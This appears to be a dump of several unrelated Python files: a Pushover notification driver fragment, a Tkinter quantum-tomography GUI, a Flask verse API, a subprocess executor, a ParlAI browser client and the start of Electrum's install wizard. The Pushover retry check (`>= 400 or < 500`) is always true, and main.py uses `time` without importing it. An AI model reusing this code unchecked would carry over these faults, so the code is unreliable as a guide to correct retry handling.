while (not sent and retry and (RETRY_MAX < 0 or cnt < RETRY_MAX)):
cnt += 1
LOGGER.info('try #{}'.format(cnt))
res = self.session.post("1/messages.json",params)
if res['status'] is True and res['data']['status'] == 1:
sent = True
self.set_error(ERROR_NONE)
else:
if 'data' in res:
if 'errors' in res['data']:
LOGGER.error('From Pushover: {}'.format(res['data']['errors']))
# No status code or not 4xx code is
LOGGER.debug('res={}'.format(res))
if 'code' in res and (res['code'] is not None and (res['code'] >= 400 or res['code'] < 500)):
LOGGER.warning('Previous error can not be fixed, will not retry')
retry = False
else:
LOGGER.warning('Previous error is retryable...')
if (not sent):
self.set_error(ERROR_MESSAGE_SEND)
if (retry and (RETRY_MAX > 0 and cnt == RETRY_MAX)):
LOGGER.error('Giving up after {} tries'.format(cnt))
retry = False
if (not sent and retry):
time.sleep(RETRY_WAIT)
#LOGGER.info('is_sent={} id={} sent_at={}'.format(message.is_sent, message.id, str(message.sent_at)))
return sent
def get(self,url,params={}):
params['token'] = self.app_key
sent = False
retry = True
cnt = 0
while (not sent and retry and (RETRY_MAX < 0 or cnt < RETRY_MAX)):
cnt += 1
LOGGER.info('try {} #{}'.format(url,cnt))
res = self.session.get(url,params)
LOGGER.info('got {}'.format(res))
if res['status'] is True and res['data']['status'] == 1:
sent = True
self.set_error(ERROR_NONE)
else:
if 'data' in res:
if 'errors' in res['data']:
LOGGER.error('From Pushover: {}'.format(res['data']['errors']))
# No status code or not 4xx code is
LOGGER.debug('res={}'.format(res))
if 'code' in res and (res['code'] is not None and (res['code'] >= 400 or res['code'] < 500)):
LOGGER.warning('Previous error can not be fixed, will not retry')
retry = False
else:
LOGGER.warning('Previous error is retryable...')
if (not sent):
self.set_error(ERROR_UNKNOWN)
if (retry and (RETRY_MAX > 0 and cnt == RETRY_MAX)):
LOGGER.error('Giving up after {} tries'.format(cnt))
retry = False
if (not sent and retry):
time.sleep(RETRY_WAIT)
#LOGGER.info('is_sent={} id={} sent_at={}'.format(message.is_sent, message.id, str(message.sent_at)))
if 'data' in res:
return { 'status': sent, 'data': res['data'] }
else:
return { 'status': sent, 'data': False }
def rest_send(self,params):
LOGGER.debug('params={}'.format(params))
if 'priority' in params:
# Our priority's start at 0 pushovers starts at -2... Should have used their numbers...
# So assume rest calls pass in pushover number, so convert to our number.
params['priority'] = int(params['priority']) + 2
return self.do_send(params)
_init_st = None
id = 'pushover'
drivers = [
{'driver': 'ST', 'value': 0, 'uom': 2},
{'driver': 'ERR', 'value': 0, 'uom': 25},
{'driver': 'GV1', 'value': 0, 'uom': 25},
{'driver': 'GV2', 'value': 2, 'uom': 25},
{'driver': 'GV3', 'value': 0, 'uom': 25},
{'driver': 'GV4', 'value': 30, 'uom': 56},
{'driver': 'GV5', 'value': 10800, 'uom': 56},
{'driver': 'GV6', 'value': 0, 'uom': 25},
{'driver': 'GV7', 'value': 0, 'uom': 25},
]
commands = {
#'DON': setOn, 'DOF': setOff
'SET_DEVICE': cmd_set_device,
'SET_PRIORITY': cmd_set_priority,
'SET_FORMAT': cmd_set_format,
'SET_RETRY': cmd_set_retry,
'SET_EXPIRE': cmd_set_expire,
'SET_SOUND': cmd_set_sound,
'SET_MESSAGE': cmd_set_message,
'SET_SYS_SHORT': cmd_set_sys_short,
'SEND': cmd_send_message,
'SEND_SYS_SHORT': cmd_send_sys_short,
'SEND_MY_MESSAGE': cmd_send_my_message,
'SEND_MY_SYS_SHORT': cmd_send_my_sys_short,
'GV10': cmd_send_sys_short_with_params,
}
|
gui.py
|
import tomo
import numpy as np
from threading import Thread
import matplotlib.pyplot as plt
from matplotlib.backends.backend_tkagg import (FigureCanvasTkAgg, NavigationToolbar2Tk)
from matplotlib.backend_bases import key_press_handler
import matplotlib.animation as animation
from matplotlib import style
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.colors as colors
import matplotlib.cm as cm
import matplotlib.ticker as ticker
import tkinter as tk
from tkinter import ttk
from tkinter import messagebox
from PIL import ImageTk, Image
import os
Q,P,W,m,angles,volt = np.empty(0),np.empty(0),np.empty(0),np.empty(0),np.empty(0),np.empty(0)
q1C,q2C,p1C,p2C,densityC,kcC=-5,5,-5,5,50,5
color,angle1,angle2='cividis',45,45
t = None
buttonQQ,buttonNM=None,None
file1,file2,file3,change="SampleStates/rhoVac.dat","SampleStates/phiVac.dat","SampleStates/xVac.dat",False
class counter:
def __init__(self):
self.count = 0
self.start = False
self.end = False
def get(self):
return self.count
def set(self,x):
self.count = x
def started(self):
self.start = True
def ended(self):
self.end = True
class popupWindow(object):
def __init__(self,master):
top=self.top=tk.Toplevel(master)
self.l=tk.Label(top,text="N value")
self.l.pack()
self.e=tk.Entry(top,validate='key',validatecommand=(master.register(self.validate),'%d', '%i', '%P', '%s', '%S', '%v', '%V', '%W'))
self.e.delete(0,tk.END)
self.e.insert(0,"20")
self.e.pack()
self.l1=tk.Label(top,text="M value")
self.l1.pack()
self.f=tk.Entry(top,validate='key',validatecommand=(master.register(self.validate),'%d', '%i', '%P', '%s', '%S', '%v', '%V', '%W'))
self.f.delete(0,tk.END)
self.f.insert(0,"20")
self.f.pack()
self.b=tk.Button(top,text='Continue',command=self.cleanup)
self.b.pack()
def cleanup(self):
self.n=self.e.get()
self.m=self.f.get()
self.top.destroy()
def validate(self, action, index, value_if_allowed,
prior_value, text, validation_type, trigger_type, widget_name):
if value_if_allowed:
try:
int(value_if_allowed)
return True
except ValueError:
return False
else:
return False
contador = counter()
def task():
global contador
if contador.start:
progress.set(contador.get()*100/(densityC*densityC))
if contador.end:
graficar()
contador = counter()
t = None
win.after(200, task)
def styl(*args):
global Q,P,W,color,angle1,angle2
if color!=col.get() or angle1!=a1.get() or angle2!=a2.get():
color=col.get()
angle1=a1.get()
angle2=a2.get()
if np.size(Q)<1 or np.size(P)<1 or np.size(W)<1:
return
graficar()
def check():
global q1C,q2C,p1C,p2C,densityC,kcC,t
q1C,q2C,p1C,p2C,densityC,kcC=qmin.get(),qmax.get(),pmin.get(),pmax.get(),dense.get(),cut.get()
#b.step(50)
#win.update()
for widget in frame1.winfo_children():
widget.destroy()
t = Thread(target=data)
t.start()
bar()
'''
b=bar()
while(t.is_alive()):
b.wait_variable(progress)
b.update()
graficar()
'''
def data():
global Q,P,W,m,angles,volt,contador,file1,file2,file3, change
if np.size(m)<1 or np.size(angles)<1 or np.size(volt)<1 or change:
m,angles,volt=tomo.loadData(file1,file2,file3)
change=False
generateButton["state"] ='disabled'
contador.started()
Q,P,W = tomo.tomo(m,angles,volt,contador,q1=q1C,q2=q2C,p1=p1C,p2=p2C,density=densityC,kc=kcC)
contador.ended()
generateButton["state"] ='normal'
def changeData1():
file = tk.filedialog.askopenfilename(initialdir = os.path.abspath(""),title = "Load data m",filetypes = (("Data files","*.dat"),("all files","*.*")))
if file == "":
tk.messagebox.showinfo('Error','The file does not exist!')
global file1, change
file1 = file
change=True
txtFile1.set(file1.split("/")[-1])
def changeData2():
file = tk.filedialog.askopenfilename(initialdir = os.path.abspath(""),title = "Load data phi",filetypes = (("Data files","*.dat"),("all files","*.*")))
if file == "":
tk.messagebox.showinfo('Error','The file does not exist!')
global file2, change
file2 = file
change=True
txtFile2.set(file2.split("/")[-1])
def changeData3():
file = tk.filedialog.askopenfilename(initialdir = os.path.abspath(""),title = "Load data x",filetypes = (("Data files","*.dat"),("all files","*.*")))
if file == "":
tk.messagebox.showinfo('Error','The file does not exist!')
global file3, change
file3 = file
change=True
txtFile3.set(file3.split("/")[-1])
def fmt(x, pos):
a, b = '{:.0e}'.format(x).split('e')
b = int(b)
return r'${} \times 10^{{{}}}$'.format(a, b)
def densityMatrixQQ():
global W,Q,P
rhopP, listPosP, listNegP, rhopQ, listPosQ, listNegQ = tomo.quadratureToRho(W,Q,P)
'''
fig = plt.figure(num='Density matrix')
ax = fig.add_subplot(121, projection='3d')
ax.scatter(listPosP, listNegP,rhopP,c=rhopP,cmap='gray')
ax.set_title("P")
ax.view_init(elev=angle1, azim=angle2)
ax = fig.add_subplot(122, projection='3d')
ax.scatter(listPosQ, listNegQ,rhopQ,c=rhopQ,cmap='gray')
ax.set_title("Q")
ax.view_init(elev=angle1, azim=angle2)
plt.show()
'''
Xp, Yp, Zp = tomo.rhoFitting(rhopP, listPosP, listNegP,np.max(P),np.min(P))
Xq, Yq, Zq = tomo.rhoFitting(rhopQ, listPosQ, listNegQ,np.max(Q),np.min(Q))
#Xp, Yp, Zp = tomo.rhoInterpolate(rhopP, listPosP, listNegP,np.max(P),np.min(P))
#Xq, Yq, Zq = tomo.rhoInterpolate(rhopQ, listPosQ, listNegQ,np.max(Q),np.min(Q))
plotDensityMatrixQQ(Xp, Yp, Zp, Xq, Yq, Zq)
state = 0
def changeState(dir):
global state
if dir:
state+=1
else:
state-=1
if state == 0:
generateButton["state"] = "normal"
else:
generateButton["state"] = "disabled"
def argumentsRhoNM():
w = popupWindow(win)
changeState(True)
buttonNM["state"] = "disabled"
win.wait_window(w.top)
ni,mi=int(w.n),int(w.m)
densityMatrixNM(ni,mi)
buttonNM["state"] = "normal"
changeState(False)
def argumentsMatrixQQ():
changeState(True)
buttonQQ["state"] = "disabled"
densityMatrixQQ()
buttonQQ["state"] = "normal"
changeState(False)
def densityMatrixNM(ni,mi):
global W,Q,P
rhopP, listPosP, listNegP, rhopQ, listPosQ, listNegQ = tomo.quadratureToRho(W,Q,P)
Xp, Yp, Zp = tomo.rhoFitting(rhopP, listPosP, listNegP,np.max(P),np.min(P))
Xq, Yq, Zq = tomo.rhoFitting(rhopQ, listPosQ, listNegQ,np.max(Q),np.min(Q))
#Xp, Yp, Zp = tomo.rhoInterpolate(rhopP, listPosP, listNegP,np.max(P),np.min(P))
#Xq, Yq, Zq = tomo.rhoInterpolate(rhopQ, listPosQ, listNegQ,np.max(Q),np.min(Q))
rhon, nr, mr = tomo.rhoFock( Zq, Xq, Yq, ni,mi)
plotDensityMatrixNM(rhon, nr, mr)
def plotDensityMatrixQQ(Xp, Yp, Zp, Xq, Yq, Zq):
fig, axes = plt.subplots(figsize=(10,4),nrows=1, ncols=2, num="Density matrix in quadrature representation")
l=np.array([1/100000.,1/10000.,1/1000.,1/100.,1/10.,1])
ax = axes[0]
h = ax.contour(Xp,Yp,Zp,levels=l,norm=colors.LogNorm(vmin=1/1000000., vmax=1),cmap='Blues')
ax.set_xlabel(r'$p$')
ax.set_ylabel(r'$p^\prime$')
ax.set_aspect('equal')
ax = axes[1]
ax.contour(Xq,Yq,Zq,levels=l,norm=colors.LogNorm(vmin=1/1000000., vmax=1),cmap='Blues')
ax.set_xlabel(r'$q$')
ax.set_ylabel(r'$q^\prime$')
ax.set_aspect('equal')
fig.colorbar(h, ax=axes.ravel().tolist(),format=ticker.FuncFormatter(fmt))
#plt.savefig("rhoQPVac.png",dpi=300)
plt.show()
def plotDensityMatrixNM(rhon, nr, mr):
'''
rhon, nr, mr = tomo.rhoFock(rhopP, listPosP, listNegP,np.max(P),np.min(P))
X, Y = np.meshgrid(nr, mr)
x,y = X.ravel(),Y.ravel()
top = rhon.ravel()
top = np.abs(top)
bottom = np.zeros_like(top)
width = depth = 1
fig = plt.figure(figsize=(10,5))
ax = fig.add_subplot(121, projection='3d')
dz = top
offset = dz + np.abs(dz.min())
fracs = offset.astype(float)/offset.max()
norm = colors.Normalize(fracs.min(), fracs.max())
color_values = cm.Greens(norm(fracs.tolist()))
ax.bar3d(x, y, bottom, width, depth, top, shade=True,color=color_values)
ax.set_ylabel("n")
ax.set_xlabel("m")
ax.set_zlabel(r"$|\rho_{nm}|$")
ax.xaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))
ax.yaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))
ax.xaxis._axinfo["grid"]['color'] = (1,1,1,0)
ax.yaxis._axinfo["grid"]['color'] = (1,1,1,0)
ax.zaxis._axinfo["grid"]['color'] = (1,1,1,0)
'''
fig = plt.figure(num="Density matrix in Fock representation")
X, Y = np.meshgrid(mr,nr)
x,y = X.ravel(),Y.ravel()
top = rhon.ravel()
top = np.abs(top)
bottom = np.zeros_like(top)
width = depth = 1
ax = fig.add_subplot(111, projection='3d')
dz = top
offset = dz + np.abs(dz.min())
fracs = offset.astype(float)/offset.max()
norm = colors.Normalize(fracs.min(), fracs.max())
color_values = cm.Greens(norm(fracs.tolist()))
ax.bar3d(x, y, bottom, width, depth, top, shade=True,color=color_values)
ax.set_ylabel("n")
ax.set_xlabel("m")
ax.set_zlabel(r"$|\rho_{nm}|$")
ax.xaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))
ax.yaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))
ax.xaxis._axinfo["grid"]['color'] = (1,1,1,0)
ax.yaxis._axinfo["grid"]['color'] = (1,1,1,0)
ax.zaxis._axinfo["grid"]['color'] = (1,1,1,0)
#plt.savefig("rhoNMVac.png",dpi=300)
plt.show()
def graficar():
for widget in frame1.winfo_children():
widget.destroy()
b = bar(indetermine=True)
global Q,P,W,color,angle1,angle2,buttonQQ,buttonNM
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
X, Y = np.meshgrid(P,Q)
ax.set_ylabel(r"$q$")
ax.set_xlabel(r"$p$")
ax.set_zlabel(r"$W(q,p)$")
ax.view_init(elev=angle1, azim=angle2)
h = ax.plot_surface(X, Y, W, rstride=1, cstride=1, cmap=color, edgecolor='none')
#ax.contour(X, Y, W)
ax.xaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))
ax.yaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))
ax.xaxis._axinfo["grid"]['color'] = (1,1,1,0)
ax.yaxis._axinfo["grid"]['color'] = (1,1,1,0)
ax.zaxis._axinfo["grid"]['color'] = (1,1,1,0)
#plt.savefig("number",dpi=300)
plt.close()
Plot = FigureCanvasTkAgg(fig, master=frame1)
Plot.draw()
Plot.get_tk_widget().pack(side='top', fill='both', expand=1)
b.destroy()
toolbar = NavigationToolbar2Tk(Plot, frame1)
toolbar.children['!button2'].pack_forget()
toolbar.children['!button3'].pack_forget()
buttonQQ = tk.Button(master=toolbar, text="Density Matrix quadrature", command= lambda: argumentsMatrixQQ())
buttonNM = tk.Button(master=toolbar, text="Density Matrix Fock", command= lambda: argumentsRhoNM())
buttonNM.pack(side="right")
buttonQQ.pack(side="right")
toolbar.update()
def bar(indetermine=False):
progress.set(0)
s = ttk.Style()
s.theme_use('clam')
TROUGH_COLOR = 'white'
BAR_COLOR = '#308fac'
s.configure("bar.Horizontal.TProgressbar", troughcolor=TROUGH_COLOR, bordercolor=TROUGH_COLOR, background=BAR_COLOR, lightcolor=BAR_COLOR, darkcolor=BAR_COLOR)
if indetermine:
loadingBar = ttk.Progressbar(frame1, mode="indeterminate", style="bar.Horizontal.TProgressbar")
loadingBar.start()
else:
loadingBar = ttk.Progressbar(frame1, style="bar.Horizontal.TProgressbar", variable=progress)
#loadingBar.config(maximum=densityC*densityC)
loadingBar.place(relx=.5, rely=.5, anchor="center",relwidth=0.5)
return loadingBar
if __name__ == "__main__":
win = tk.Tk()
win.geometry('1125x900')
win.title('Quantum Tomography')
win.config(cursor = "arrow")
frame1 = tk.Frame(win, background='#308fac')
frame1.place(relwidth=0.8, relheight=1)
frame2 = tk.Frame(win)
frame2.place(relx=0.8,relwidth=0.2, relheight=1)
tk.Label(master = frame2).grid(row=0, column=0)
tk.Label(master = frame2).grid(row=0, column=1)
tk.Label(master = frame2, text = "Q min:").grid(row=1, column=0)
tk.Label(master = frame2, text = "Q max:").grid(row=2, column=0)
tk.Label(master = frame2, text = "P min:").grid(row=3, column=0)
tk.Label(master = frame2, text = "P max:").grid(row=4, column=0)
tk.Label(master = frame2, text = "Density:").grid(row=5, column=0)
tk.Label(master = frame2, text = "Kc:").grid(row=6, column=0)
generateButton = tk.Button(frame2, text='Tomography', command=check)
generateButton.grid(row=7, column=1)
tk.Label(master = frame2).grid(row=8, column=0)
tk.Label(master = frame2).grid(row=8, column=1)
tk.Label(master = frame2, text = "Color:").grid(row=9, column=0)
tk.Label(master = frame2, text = "Angle 1:").grid(row=10, column=0)
tk.Label(master = frame2, text = "Angle 2:").grid(row=11, column=0)
tk.Label(master = frame2).grid(row=12, column=0)
tk.Label(master = frame2).grid(row=12, column=1)
tk.Label(master = frame2, text = "Data x:").grid(row=13, column=0)
tk.Label(master = frame2, text = "Data phi:").grid(row=14, column=0)
tk.Label(master = frame2, text = "Data pr:").grid(row=15, column=0)
txtFile3 = tk.StringVar()
bFile3 = tk.Button(frame2, textvariable=txtFile3, command=changeData3)
txtFile3.set(file3.split("/")[-1])
bFile3.grid(row=13, column=1)
txtFile2 = tk.StringVar()
bFile2 = tk.Button(frame2, textvariable=txtFile2, command=changeData2)
txtFile2.set(file2.split("/")[-1])
bFile2.grid(row=14, column=1)
txtFile1 = tk.StringVar()
bFile1 = tk.Button(frame2, textvariable=txtFile1, command=changeData1)
txtFile1.set(file1.split("/")[-1])
bFile1.grid(row=15, column=1)
tk.Label(master = frame2).grid(row=16, column=0)
tk.Label(master = frame2).grid(row=16, column=1)
qmin = tk.DoubleVar()
qmin.set(q1C)
tk.Spinbox(frame2, from_=-1000000,to=1000000, textvariable=qmin, width=8).grid(row=1,column=1)
qmax = tk.DoubleVar()
qmax.set(q2C)
tk.Spinbox(frame2, from_=-1000000,to=1000000, textvariable=qmax, width=8).grid(row=2,column=1)
pmin = tk.DoubleVar()
pmin.set(p1C)
tk.Spinbox(frame2, from_=-1000000,to=1000000, textvariable=pmin, width=8).grid(row=3,column=1)
pmax = tk.DoubleVar()
pmax.set(p2C)
tk.Spinbox(frame2, from_=-1000000,to=1000000, textvariable=pmax, width=8).grid(row=4,column=1)
dense = tk.IntVar()
dense.set(densityC)
tk.Spinbox(frame2, from_=-1000000,to=1000000, textvariable=dense, width=8).grid(row=5,column=1)
cut = tk.DoubleVar()
cut.set(kcC)
tk.Spinbox(frame2, from_=-100,to=100, textvariable=cut, width=8).grid(row=6,column=1)
col = tk.StringVar()
op = ['viridis', 'plasma', 'inferno', 'magma', 'cividis','Greys', 'Purples', 'Blues', 'Greens', 'Oranges', 'Reds']
col.set(color)
menu = tk.OptionMenu(frame2, col, *op, command=styl)
menu.config(width=8)
menu.grid(row=9,column=1)
a1 = tk.DoubleVar()
a1.set(angle1)
e = tk.Entry(frame2, textvariable = a1, width = 8)
e.grid(row=10,column=1)
e.bind("<FocusOut>",styl)
e.bind("<Return>",styl)
a2 = tk.DoubleVar()
a2.set(angle2)
e = tk.Entry(frame2, textvariable = a2, width = 8)
e.grid(row=11,column=1)
e.bind("<FocusOut>",styl)
e.bind("<Return>",styl)
frame2.grid_rowconfigure(8, weight=1)
frame2.grid_rowconfigure(12, weight=1)
frame2.grid_columnconfigure(0, weight=1)
frame2.grid_columnconfigure(1, weight=1)
progress = tk.IntVar()
tk.Label(master = frame2, text = "Progress %").grid(row=17, column=0)
pr = tk.Entry(frame2, textvariable = progress, width = 8)
pr.grid(row=17,column=1)
pr.config(state=tk.DISABLED)
win.after(1000, task)
win.mainloop()
|
main.py
|
from flask import Flask, jsonify
from flask_restful import Resource, Api
from driver_to_db import *
import json
import schedule
from threading import Thread
app = Flask(__name__)
api = Api(app)
class Verses(Resource):
def get(self):
result = get_verse_of_today()
return result
class Longest(Resource):
def get(self):
result = get_longest()
return result
def run_schedule():
while 1:
schedule.run_pending()
time.sleep(1)
api.add_resource(Verses, '/verse')
api.add_resource(Longest, '/longest')
if __name__ == '__main__':
schedule.every().day.at("06:00").do(change_verse_of_day)
t = Thread(target=run_schedule)
t.start()
app.run(debug=True)
|
executor.py
|
from concurrent.futures import _base
from multiprocessing import connection
import cPickle as pickle
import os
import select
import subprocess
import threading
import time
from .utils import debug
from . import utils
from .future import Future
class HostShutdown(RuntimeError):
pass
class DependencyFailed(RuntimeError):
pass
class Executor(_base.Executor):
def __init__(self, max_workers=None):
self._conn, child_conn = connection.Pipe()
cmd = ['python', '-m', 'uifutures.host', str(child_conn.fileno())]
env = None
self.proc = subprocess.Popen(cmd, env=env)
child_conn.close()
# Later, we may need to wait on the handshake to make sure that the
# process has started. But since we know that the socket is open since
# it is an OS pipe, we don't have to wait.
# Send some configuration over.
if max_workers:
self._conn.send(dict(
type='config',
max_workers=max_workers,
))
self._futures = {}
self._host_alive = True
self._host_listener_thread = threading.Thread(target=self._host_listener)
self._host_listener_thread.daemon = True
self._host_listener_thread.start()
def shutdown(self, wait=True):
self._conn.send(dict(
type='shutdown',
))
def _host_listener(self):
try:
while self._host_alive:
try:
rlist, _, _ = select.select([self._conn], [], [])
msg = self._conn.recv()
type_ = msg.pop('type', None)
# debug('Executor: new message of type %r:\n%s', type_, pprint.pformat(msg))
handler = getattr(self, '_do_' + (type_ or 'missing'), None)
if not handler:
debug('Executor: no handler for %r', type_)
continue
handler(**msg)
except IOError as e:
if e.errno == 35:
debug('Executor: socket temporarily unavailable; sleeping')
time.sleep(0.25)
else:
raise
except EOFError:
pass
# debug('Executor: EOF')
finally:
self._do_shutdown()
def _do_handshake(self, pid):
pass
def _do_shutdown(self):
self._host_alive = False
# debug('Executor: host shutdown')
for future in self._futures.itervalues():
future.set_exception(HostShutdown('host shutdown'))
def _do_result(self, uuid, **msg):
# debug('Executor: %s finished', uuid)
future = self._futures.pop(uuid)
result = (pickle.loads(msg['package']) if 'package' in msg else msg)['result']
future.set_result(result)
def _do_exception(self, uuid, **msg):
# debug('Executor: %s errored', uuid)
future = self._futures.pop(uuid)
exception = (pickle.loads(msg['package']) if 'package' in msg else msg)['exception']
future.set_exception(exception)
def submit(self, func, *args, **kwargs):
self.submit_ext(func, args, kwargs)
def submit_ext(self, func, args=None, kwargs=None, name=None, icon=None, depends_on=None):
uuid = os.urandom(16).encode('hex')
func_name = utils.get_func_name(func)
depends_on = depends_on or []
if not isinstance(depends_on, (list, tuple)):
depends_on = [depends_on]
depends_on = [x.uuid for x in depends_on]
self._conn.send(dict(
type='submit',
uuid=uuid,
name=name or func_name,
icon=icon,
func_name=func_name,
depends_on=depends_on,
package=pickle.dumps(dict(
func=func,
args=tuple(args or ()),
kwargs=dict(kwargs or {}),
), protocol=-1),
))
future = Future(uuid)
self._futures[uuid] = future
return future
|
client.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import json
import websocket
import threading
from parlai.core.params import ParlaiParser
from parlai.scripts.interactive_web import WEB_HTML, STYLE_SHEET, FONT_AWESOME
from http.server import BaseHTTPRequestHandler, HTTPServer
SHARED = {}
def setup_interactive(ws):
SHARED['ws'] = ws
new_message = None
message_available = threading.Event()
class BrowserHandler(BaseHTTPRequestHandler):
"""
Handle HTTP requests.
"""
def _interactive_running(self, reply_text):
data = {}
data['text'] = reply_text.decode('utf-8')
if data['text'] == "[DONE]":
print('[ Closing socket... ]')
SHARED['ws'].close()
SHARED['wb'].shutdown()
json_data = json.dumps(data)
SHARED['ws'].send(json_data)
def do_HEAD(self):
"""
Handle HEAD requests.
"""
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_POST(self):
"""
Handle POST request, especially replying to a chat message.
"""
if self.path == '/interact':
content_length = int(self.headers['Content-Length'])
body = self.rfile.read(content_length)
self._interactive_running(body)
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
model_response = {'id': 'Model', 'episode_done': False}
message_available.wait()
model_response['text'] = new_message
message_available.clear()
json_str = json.dumps(model_response)
self.wfile.write(bytes(json_str, 'utf-8'))
elif self.path == '/reset':
self._interactive_running(b"[RESET]")
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
self.wfile.write(bytes("{}", 'utf-8'))
message_available.wait()
message_available.clear()
else:
return self._respond({'status': 500})
def do_GET(self):
"""
Respond to GET request, especially the initial load.
"""
paths = {
'/': {'status': 200},
'/favicon.ico': {'status': 202}, # Need for chrome
}
if self.path in paths:
self._respond(paths[self.path])
else:
self._respond({'status': 500})
def _handle_http(self, status_code, path, text=None):
self.send_response(status_code)
self.send_header('Content-type', 'text/html')
self.end_headers()
content = WEB_HTML.format(STYLE_SHEET, FONT_AWESOME)
return bytes(content, 'UTF-8')
def _respond(self, opts):
response = self._handle_http(opts['status'], self.path)
self.wfile.write(response)
def on_message(ws, message):
"""
Prints the incoming message from the server.
:param ws: a WebSocketApp
:param message: json with 'text' field to be printed
"""
incoming_message = json.loads(message)
global new_message
new_message = incoming_message['text']
message_available.set()
def on_error(ws, error):
"""
Prints an error, if occurs.
:param ws: WebSocketApp
:param error: An error
"""
print(error)
def on_close(ws):
"""
Cleanup before closing connection.
:param ws: WebSocketApp
"""
# Reset color formatting if necessary
print("Connection closed")
def _run_browser():
host = opt.get('host', 'localhost')
serving_port = opt.get('serving_port', 8080)
httpd = HTTPServer((host, serving_port), BrowserHandler)
print('Please connect to the link: http://{}:{}/'.format(host, serving_port))
SHARED['wb'] = httpd
httpd.serve_forever()
def on_open(ws):
"""
Starts a new thread that loops, taking user input and sending it to the websocket.
:param ws: websocket.WebSocketApp that sends messages to a browser_manager
"""
threading.Thread(target=_run_browser).start()
def setup_args():
"""
Set up args, specifically for the port number.
:return: A parser that parses the port from commandline arguments.
"""
parser = ParlaiParser(False, False)
parser_grp = parser.add_argument_group('Browser Chat')
parser_grp.add_argument(
'--port', default=35496, type=int, help='Port used by the web socket (run.py)'
)
parser_grp.add_argument(
'--host',
default='localhost',
type=str,
help='Host from which allow requests, use 0.0.0.0 to allow all IPs',
)
parser_grp.add_argument(
'--serving_port',
default=8080,
type=int,
help='Port used to configure the server',
)
return parser.parse_args()
if __name__ == "__main__":
opt = setup_args()
port = opt.get('port', 34596)
print("Connecting to port: ", port)
ws = websocket.WebSocketApp(
"ws://localhost:{}/websocket".format(port),
on_message=on_message,
on_error=on_error,
on_close=on_close,
)
ws.on_open = on_open
setup_interactive(ws)
ws.run_forever()
|
installwizard.py
|
# Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import sys
import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional, TYPE_CHECKING
from functools import partial
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea, QApplication)
from electrum.wallet import Wallet, Abstract_Wallet
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.util import UserCancelled, InvalidPassword, WalletFileException, get_new_wallet_name
from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack
from electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton, char_width_in_lineedit)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
from electrum.plugin import run_hook, Plugins
if TYPE_CHECKING:
from electrum.simple_config import SimpleConfig
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:KxZcY47uGp9a... \t-> 1DckmggQM...\n' +
'p2wpkh-p2sh:KxZcY47uGp9a... \t-> 3NhNeZQXF...\n' +
'p2wpkh:KxZcY47uGp9a... \t-> bc1q3fjfk...')
# note: full key is KxZcY47uGp9aVQAb6VVvuBs8SwHKgkSR2DbZUzjDzXf2N2GPhG9n
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0] # type: InstallWizard
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
if type(out) is not tuple:
out = (out,)
run_next(*out)
except GoBack:
if wizard.can_go_back():
wizard.go_back()
return
else:
wizard.close()
raise
return func_wrapper
class WalletAlreadyOpenInMemory(Exception):
def __init__(self, wallet: Abstract_Wallet):
super().__init__()
self.wallet = wallet
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
